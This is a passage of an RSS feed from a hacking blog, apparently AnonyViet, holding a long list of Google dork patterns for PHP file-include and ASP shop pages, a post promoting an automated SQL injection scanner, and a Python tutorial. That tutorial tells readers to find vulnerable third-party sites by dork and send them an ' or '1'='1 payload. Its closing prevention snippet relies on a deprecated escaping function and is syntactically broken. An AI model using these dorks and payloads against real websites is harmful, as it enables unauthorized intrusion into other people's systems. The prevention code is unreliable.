blank.php?o=&#13;
sitio.php?pr=&#13;
index3.php?destino=&#13;
main.php?body=&#13;
blank.php?lang=&#13;
path.php?thispage=&#13;
padrao.php?OpenPage=&#13;
info.php?pageweb=&#13;
blank.php?h=&#13;
head.php?incl=&#13;
principal.php?ref=&#13;
start.php?go=&#13;
file.php?action=&#13;
template.php?t=&#13;
base.php?mid=&#13;
start.php?b=&#13;
start.php?lang=&#13;
default.php?rub=&#13;
head.php?read=&#13;
show.php?cmd=&#13;
press.php?get=&#13;
principal.php?secc=&#13;
gery.php?menu=&#13;
gery.php?corpo=&#13;
include.php?module=&#13;
page.php?redirect=&#13;
gery.php?filepath=&#13;
general.php?ir=&#13;
file.php?ref=&#13;
index1.php?seite=&#13;
include.php?pageweb=&#13;
show.php?seccion=&#13;
mod*.php?pagina=&#13;
sub*.php?name=&#13;
padrao.php?c=&#13;
padrao.php?eval=&#13;
file.php?ev=&#13;
default.php?body=&#13;
enter.php?itemnav=&#13;
blank.php?var=&#13;
index.php?addr=&#13;
blank.php?oldal=&#13;
nota.php?url=&#13;
index2.php?action=&#13;
blank.php?phpbb_root_path=&#13;
mod*.php?var=&#13;
mod*.php?strona=&#13;
nota.php?nivel=&#13;
template.php?content=&#13;
mod*.php?content=&#13;
default.php?f=&#13;
view.php?goto=&#13;
principal.php?abre=&#13;
pagina.php?filepath=&#13;
nota.php?link=&#13;
template.php?tipo=&#13;
index3.php?q=&#13;
page.php?adresa=&#13;
sitio.php?category=&#13;
index2.php?link=&#13;
sub*.php?k=&#13;
layout.php?numero=&#13;
tools/send_reminders.php?includedir=&#13;
module_db.php?pivot_path=&#13;
inc/cmses/aedatingCMS.php?dir[inc]=&#13;
modules/vwar/admin/admin.php?vwar_root=&#13;
bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=&#13;
index.php?RP_PATH=&#13;
index.php?pagename=&#13;
smarty_config.php?root_dir=&#13;
components/com_forum/download.php?phpbb_root_path=&#13;
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=&#13;
classes/adodbt/sql.php?classes_dir=&#13;
send_reminders.php?includedir=&#13;
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path=&#13;
inc/functions.inc.php?config[ppa_root_path]=&#13;
components/com_cpg/cpg.php?mosConfig_absolute_path=&#13;
admin/index.php?o=&#13;
index.php?menu=deti&amp;page=&#13;
modules/coppermine/themes/coppercop/theme.php?THEME_DIR=&#13;
m2f/m2f_phpbb204.php?m2f_root_path=&#13;
components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=&#13;
admin/doeditconfig.php?thispath=../includes&amp;config[path]=&#13;
components/com_simpleboard/image_upload.php?sbp=&#13;
wamp_dir/setup/yesno.phtml?no_url=&#13;
include/new-visitor.inc.php?lvc_include_dir=&#13;
support/mailling/maillist/inc/initdb.php?absolute_path=&#13;
coppercop/theme.php?THEME_DIR=&#13;
inc/header.php/step_one.php?server_inc=&#13;
inc/pipe.php?HCL_path=&#13;
include/new-visitor&#13;
"add.asp?bookid="&#13;
"add_cart.asp?num="&#13;
"addcart.asp?"&#13;
"addItem.asp"&#13;
"add-to-cart.asp?ID="&#13;
"addToCart.asp?idProduct="&#13;
"addtomylist.asp?ProdId="&#13;
"adminEditProductFields.asp?intProdID="&#13;
"advSearch_h.asp?idCategory="&#13;
"affiliate.asp?ID="&#13;
"affiliate-agreement.cfm?storeid="&#13;
"affiliates.asp?id="&#13;
"ancillary.asp?ID="&#13;
"archive.asp?id="&#13;
"article.asp?id="&#13;
"aspx?PageID"&#13;
"basket.asp?id="&#13;
"Book.asp?bookID="&#13;
"book_list.asp?bookid="&#13;
"book_view.asp?bookid="&#13;
"BookDetails.asp?ID="&#13;
"browse.asp?catid="&#13;
"browse_item_details.asp"&#13;
"Browse_Item_Details.asp?Store_Id="&#13;
"buy.asp?"&#13;
"buy.asp?bookid="&#13;
"bycategory.asp?id="&#13;
"cardinfo.asp?card="&#13;
"cart.asp?action="&#13;
"cart.asp?cart_id="&#13;
"cart.asp?id="&#13;
"cart_additem.asp?id="&#13;
"cart_validate.asp?id="&#13;
"cartadd.asp?id="&#13;
"cat.asp?iCat="&#13;
"catalog.asp"&#13;
"catalog.asp?CatalogID="&#13;
"catalog_item.asp?ID="&#13;
"catalog_main.asp?catid="&#13;
"category.asp"&#13;
"category.asp?catid="&#13;
"category_list.asp?id="&#13;
"categorydisplay.asp?catid="&#13;
"checkout.asp?cartid="&#13;
"checkout.asp?UserID="&#13;
"checkout_confirmed.asp?order_id="&#13;
"checkout1.asp?cartid="&#13;
"comersus_listCategoriesAndProducts.asp?idCategory ="&#13;
"comersus_optEmailToFriendForm.asp?idProduct="&#13;
"comersus_optReviewReadExec.asp?idProduct="&#13;
"comersus_viewItem.asp?idProduct="&#13;
"comments_form.asp?ID="&#13;
"contact.asp?cartId="&#13;
"content.asp?id="&#13;
"customerService.asp?TextID1="&#13;
"default.asp?catID="&#13;
"description.asp?bookid="&#13;
"details.asp?BookID="&#13;
"details.asp?Press_Release_ID="&#13;
"details.asp?Product_ID="&#13;
"details.asp?Service_ID="&#13;
"display_item.asp?id="&#13;
"displayproducts.asp"&#13;
"downloadTrial.asp?intProdID="&#13;
"emailproduct.asp?itemid="&#13;
"emailToFriend.asp?idProduct="&#13;
"events.asp?ID="&#13;
"faq.asp?cartID="&#13;
"faq_list.asp?id="&#13;
"faqs.asp?id="&#13;
"feedback.asp?title="&#13;
"freedownload.asp?bookid="&#13;
"fullDisplay.asp?item="&#13;
"getbook.asp?bookid="&#13;
"GetItems.asp?itemid="&#13;
"giftDetail.asp?id="&#13;
"help.asp?CartId="&#13;
"home.asp?id="&#13;
"index.asp?cart="&#13;
"index.asp?cartID="&#13;
"index.asp?ID="&#13;
"info.asp?ID="&#13;
"item.asp?eid="&#13;
"item.asp?item_id="&#13;
"item.asp?itemid="&#13;
"item.asp?model="&#13;
"item.asp?prodtype="&#13;
"item.asp?shopcd="&#13;
"item_details.asp?catid="&#13;
"item_list.asp?maingroup"&#13;
"item_show.asp?code_no="&#13;
"itemDesc.asp?CartId="&#13;
"itemdetail.asp?item="&#13;
"itemdetails.asp?catalogid="&#13;
"learnmore.asp?cartID="&#13;
"links.asp?catid="&#13;
"list.asp?bookid="&#13;
"List.asp?CatID="&#13;
"listcategoriesandproducts.asp?idCategory="&#13;
"modline.asp?id="&#13;
"myaccount.asp?catid="&#13;
"news.asp?id="&#13;
"order.asp?BookID="&#13;
"order.asp?id="&#13;
"order.asp?item_ID="&#13;
"OrderForm.asp?Cart="&#13;
"page.asp?PartID="&#13;
"payment.asp?CartID="&#13;
"pdetail.asp?item_id="&#13;
"powersearch.asp?CartId="&#13;
"price.asp"&#13;
"privacy.asp?cartID="&#13;
"prodbycat.asp?intCatalogID="&#13;
"prodetails.asp?prodid="&#13;
"prodlist.asp?catid="&#13;
"product.asp?bookID="&#13;
"product.asp?intProdID="&#13;
"product_info.asp?item_id="&#13;
"productDetails.asp?idProduct="&#13;
"productDisplay.asp"&#13;
"productinfo.asp?item="&#13;
"productlist.asp?ViewType=Category&amp;CategoryID= "&#13;
"productpage.asp"&#13;
"products.asp?ID="&#13;
"products.asp?keyword="&#13;
"products_category.asp?CategoryID="&#13;
"products_detail.asp?CategoryID="&#13;
"productsByCategory.asp?intCatalogID="&#13;
"prodView.asp?idProduct="&#13;
"promo.asp?id="&#13;
"promotion.asp?catid="&#13;
"pview.asp?Item="&#13;
"resellers.asp?idCategory="&#13;
"results.asp?cat="&#13;
"savecart.asp?CartId="&#13;
"search.asp?CartID="&#13;
"searchcat.asp?search_id="&#13;
"Select_Item.asp?id="&#13;
"Services.asp?ID="&#13;
"shippinginfo.asp?CartId="&#13;
"shop.asp?a="&#13;
"shop.asp?action="&#13;
"shop.asp?bookid="&#13;
"shop.asp?cartID="&#13;
"shop_details.asp?prodid="&#13;
"shopaddtocart.asp"&#13;
"shopaddtocart.asp?catalogid="&#13;
"shopbasket.asp?bookid="&#13;
"shopbycategory.asp?catid="&#13;
"shopcart.asp?title="&#13;
"shopcreatorder.asp"&#13;
"shopcurrency.asp?cid="&#13;
"shopdc.asp?bookid="&#13;
"shopdisplaycategories.asp"&#13;
"shopdisplayproduct.asp?catalogid="&#13;
"shopdisplayproducts.asp"&#13;
"shopexd.asp"&#13;
"shopexd.asp?catalogid="&#13;
"shopping_basket.asp?cartID="&#13;
"shopprojectlogin.asp"&#13;
"shopquery.asp?catalogid="&#13;
"shopremoveitem.asp?cartid="&#13;
"shopreviewadd.asp?id="&#13;
"shopreviewlist.asp?id="&#13;
"ShopSearch.asp?CategoryID="&#13;
"shoptellafriend.asp?id="&#13;
"shopthanks.asp"&#13;
"shopwelcome.asp?title="&#13;
"show_item.asp?id="&#13;
"show_item_details.asp?item_id="&#13;
"showbook.asp?bookid="&#13;
"showStore.asp?catID="&#13;
"shprodde.asp?SKU="&#13;
"specials.asp?id="&#13;
"store.asp?id="&#13;
"store_bycat.asp?id="&#13;
"store_listing.asp?id="&#13;
"Store_ViewProducts.asp?Cat="&#13;
"store-details.asp?id="&#13;
"storefront.asp?id="&#13;
"storefronts.asp?title="&#13;
"storeitem.asp?item="&#13;
"StoreRedirect.asp?ID="&#13;
"subcategories.asp?id="&#13;
"tek9.asp?"&#13;
"template.asp?Action=Item&amp;pid="&#13;
"topic.asp?ID="&#13;
"tuangou.asp?bookid="&#13;
"type.asp?iType="&#13;
"updatebasket.asp?bookid="&#13;
"updates.asp?ID="&#13;
"view.asp?cid="&#13;
"view_cart.asp?title="&#13;
"view_detail.asp?ID="&#13;
"viewcart.asp?CartId="&#13;
"viewCart.asp?userID="&#13;
"viewCat_h.asp?idCategory="&#13;
"viewevent.asp?EventID="&#13;
"viewitem.asp?recor="&#13;
"viewPrd.asp?idcategory="&#13;
"ViewProduct.asp?misc="&#13;
"voteList.asp?item_ID="&#13;
"whatsnew.asp?idCategory="&#13;
"WsAncillary.asp?ID"&#13;
</pre>
</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;838&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/dork-sql-2015-anonyviet/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2015/12/dorks1.png" medium="image"></media:content>
            	</item>
		<item>
		<title>SQLI Hunter v1.2 &#8211; Automatically find SQL Injection errors</title>
		<link>https://en.anonyviet.com/sqli-hunter-v1-2-automatically-find-sql-injection-errors/</link>
					<comments>https://en.anonyviet.com/sqli-hunter-v1-2-automatically-find-sql-injection-errors/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 01 Feb 2023 01:08:34 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Automatically]]></category>
		<category><![CDATA[errors]]></category>
		<category><![CDATA[Find]]></category>
		<category><![CDATA[Hunter]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[SQLi]]></category>
		<category><![CDATA[v1.2]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=7659</guid>

					<description><![CDATA[SQLI Hunter is a tool that automatically scans for SQL Injection vulnerabilities in a .This tool automatically searches for websites with SQL errors from Google using google dorks!Always scan the admin link ^^Anyone who plays with SQL Injection should not ignore this tool Join the channel Telegram of the AnonyViet 👉 Link 👈 >>>Download]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p>SQLI Hunter is a tool that automatically scans for SQL Injection vulnerabilities in a .<br />This tool automatically searches for websites with SQL errors from Google using google dorks!<br />Always scan the admin link ^^<br />Anyone who plays with SQL Injection should not ignore this tool</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p style="text-align: center;"><a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fadf.ly%2F1U8NHU" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">>>>Download<<<</a></p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;982&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/sqli-hunter-v1-2-automatically-find-sql-injection-errors/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2015/12/promo.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Code guide to test Sql Injection security holes with Python script and how to prevent it.</title>
		<link>https://en.anonyviet.com/code-guide-to-test-sql-injection-security-holes-with-python-script-and-how-to-prevent-it/</link>
					<comments>https://en.anonyviet.com/code-guide-to-test-sql-injection-security-holes-with-python-script-and-how-to-prevent-it/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sun, 29 Jan 2023 23:21:52 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Code]]></category>
		<category><![CDATA[Guide]]></category>
		<category><![CDATA[holes]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[prevent]]></category>
		<category><![CDATA[Python]]></category>
		<category><![CDATA[script]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[Test]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=6451</guid>

					<description><![CDATA[In this post, AnonyViet will help you check if your website is attacked by python sql syntax 🙂 …!!! Join the channel Telegram of the AnonyViet 👉 Link 👈 And it will only work if the variables use the GET method. Here we will write a code in python language. We will need an internet [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p><span style="color: #ff0000">In this post, <strong>AnonyViet</strong> will help you check if your website is attacked by python sql syntax 🙂 …!!!</span></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><span style="color: #ff0000">And it will only work if the variables use the GET method.</span></p>
<p><span style="color: #ff0000">Here we will write a code in python language.</span></p>
<p><span style="color: #ff0000">We will need an internet connection to check and a vulnerable website.</span></p>
<p><span style="color: #ff0000">To find a vulnerable website for testing, go to google and type dorks SQLi :</span></p>
<p><code>inurl: "index.php? Cat_id ="</code></p>
<p><img decoding="async" class=" wp-image-5639 aligncenter" src="https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-12.38.09-AM-300x208.png" alt="Code guide to test Sql Injection security holes with Python script and how to prevent it.  9" width="691" height="479" srcset="https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-12.38.09-AM-300x208.png 300w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-12.38.09-AM-1024x711.png 1024w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-12.38.09-AM-768x533.png 768w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-12.38.09-AM-1536x1066.png 1536w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-12.38.09-AM-750x521.png 750w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-12.38.09-AM-1140x791.png 1140w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-12.38.09-AM.png 1902w" sizes="(max-width: 691px) 100vw, 691px" title="Code guide to test Sql Injection security holes with Python script and how to prevent it.  11"/></p>
<p><span style="font-size: 24pt;color: #ff0000">You follow the steps below to write a piece of python code:</span></p>
<p><span style="color: #ff0000">First open notepad/sublime Text , … create a file then save it: new.py</span></p>
<p><span style="color: #ff0000">We will use <strong>sys, urllib </strong>and<strong> urllib.request modules</strong>.  So import the following libraries: <strong>import sys, urllib, urllib.request</strong> or <strong>import sys</strong>, <strong>import urllib</strong> and <strong>import urllib.request</strong></span></p>
<p><img decoding="async" loading="lazy" class="wp-image-5652 aligncenter" src="https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.59.33-AM-300x174.png" alt="Code guide to test Sql Injection security holes with Python script and how to prevent it.  ten" width="690" height="400" srcset="https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.59.33-AM-300x174.png 300w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.59.33-AM-1024x595.png 1024w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.59.33-AM-768x446.png 768w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.59.33-AM-1536x892.png 1536w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.59.33-AM-750x435.png 750w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.59.33-AM-1140x662.png 1140w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.59.33-AM.png 1588w" sizes="auto, (max-width: 690px) 100vw, 690px" title="Code guide to test Sql Injection security holes with Python script and how to prevent it.  twelfth"/></p>
<p><span style="color: #ff0000">Next: Now we will need to select the input type.</span></p>
<p><span style="font-size: 12pt;color: #ff0000"><strong>1. Use the input(“”) command to get input from the user. </strong></span></p>
<p><strong>fullurl = input(“Please specify the full vulnerable url: “)</strong></p>
<p><img decoding="async" loading="lazy" class="wp-image-5651 aligncenter" src="https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.58.55-AM-300x172.png" alt="Code guide to test Sql Injection security holes with Python script and how to prevent it.  11" width="708" height="406" srcset="https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.58.55-AM-300x172.png 300w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.58.55-AM-1024x588.png 1024w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.58.55-AM-768x441.png 768w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.58.55-AM-1536x883.png 1536w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.58.55-AM-750x431.png 750w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.58.55-AM-1140x655.png 1140w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.58.55-AM.png 1580w" sizes="auto, (max-width: 708px) 100vw, 708px" title="Code guide to test Sql Injection security holes with Python script and how to prevent it.  13"/></p>
</p>
<p><span style="color: #ff0000"><strong>2. Code that makes a web request</strong></span></p>
<p><span style="color: #ff0000">This is the most important part.</span></p>
<p><code><strong>resp = urllib.request.urlopen(fullurl + "=1\' or \'1\' = \'1\'")</strong></code><br /><code><strong>body = resp.read()</strong></code><br /><code><strong>fullbody = body.decode(‘utf-8’)</strong></code></p>
<p><img decoding="async" loading="lazy" class="wp-image-5650 aligncenter" src="https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.58.09-AM-300x171.png" alt="Code guide to test Sql Injection security holes with Python script and how to prevent it.  twelfth" width="758" height="432" srcset="https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.58.09-AM-300x171.png 300w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.58.09-AM-1024x583.png 1024w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.58.09-AM-768x437.png 768w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.58.09-AM-1536x875.png 1536w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.58.09-AM-750x427.png 750w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.58.09-AM-1140x649.png 1140w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.58.09-AM.png 1542w" sizes="auto, (max-width: 758px) 100vw, 758px" title="Code guide to test Sql Injection security holes with Python script and how to prevent it.  14"/></p>
<p><span style="color: #ff0000">Now make our program check if the target is vulnerable, once we have response then we have to check if it has SQL error.</span></p>
<p><span style="color: #ff0000">We will use this code:</span></p>
<p><code><strong>if “You have an error in your SQL syntax” in fullbody:</strong></code></p>
<p><code><strong>print (“The website is classic SQL injection vulnerable!”)</strong></code></p>
<p><code><strong>else:</strong></code></p>
<p><code><strong>print (“The website is not classic SQL injection vulnerable!”)</strong></code></p>
<p><img decoding="async" loading="lazy" class="wp-image-5648 aligncenter" src="https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.57.07-AM-300x173.png" alt="Code guide to test Sql Injection security holes with Python script and how to prevent it.  13" width="675" height="389" srcset="https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.57.07-AM-300x173.png 300w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.57.07-AM-1024x592.png 1024w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.57.07-AM-768x444.png 768w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.57.07-AM-1536x888.png 1536w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.57.07-AM-1140x659.png 1140w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.57.07-AM.png 1584w" sizes="auto, (max-width: 675px) 100vw, 675px" title="Code guide to test Sql Injection security holes with Python script and how to prevent it.  15"/><span style="color: #ff0000">Ok.  Now let&#8217;s run it:</span></p>
<p><span style="color: #ff0000">Use the command: python “name”.py</span></p>
<p><span style="color: #ff0000">Then enter the site you found at the beginning.</span></p>
<p><img decoding="async" loading="lazy" class="wp-image-5646 aligncenter" src="https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.30.08-AM-300x151.png" alt="Code guide to test Sql Injection security holes with Python script and how to prevent it.  14" width="664" height="334" srcset="https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.30.08-AM-300x151.png 300w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.30.08-AM-1024x517.png 1024w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.30.08-AM-768x387.png 768w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.30.08-AM-360x180.png 360w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.30.08-AM-750x378.png 750w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.30.08-AM-1140x575.png 1140w, https://anonyviet.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-21-at-1.30.08-AM.png 1340w" sizes="auto, (max-width: 664px) 100vw, 664px" title="Code guide to check for Sql Injection security vulnerabilities with Python script and how to prevent it.  16"/></p>
<p><span style="color: #ff0000">Ok so it worked.</span></p>
<p><span style="color: #ff0000">Method 2: Use it quickly, then use it</span></p>
<ul>
<li><span style="color: #ff0000">python “name”.py -w website</span></li>
</ul>
<p><span style="text-decoration: underline;font-size: 18pt"><strong><span style="color: #ff0000;text-decoration: underline">Now to prevent Hacker from checking my site with SQL injection, I do the following:</span></strong></span></p>
<p><span style="color: #ff0000">Prevent SQLi on MYSQL simply use the string mysql_real_escape for queries, for example:</span></p>
<p><code><strong>$query = sprintf(“SELECT * FROM users where user=’%s’ AND password=’%s’,</strong></code></p>
<p><code><strong>                        mysql_real_escape_string($username)</strong></code></p>
<p><code><strong>                        mysql_real_escape_string($password)</strong></code></p>
<p><span style="color: #ff0000">Wish you success and accompany AnonyViet. </span></p>
<p><span style="color: #ff0000">Love !!</span></p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;5638&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/code-guide-to-test-sql-injection-security-holes-with-python-script-and-how-to-prevent-it/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2017/06/12121212.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>What is SQL Injection?  How to Prevent SQL Injection Vulnerabilities</title>
		<link>https://en.anonyviet.com/what-is-sql-injection-how-to-prevent-sql-injection-vulnerabilities/</link>
					<comments>https://en.anonyviet.com/what-is-sql-injection-how-to-prevent-sql-injection-vulnerabilities/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sun, 29 Jan 2023 09:49:33 +0000</pubDate>
				<category><![CDATA[Tips]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[prevent]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[Vulnerabilities]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=6115</guid>

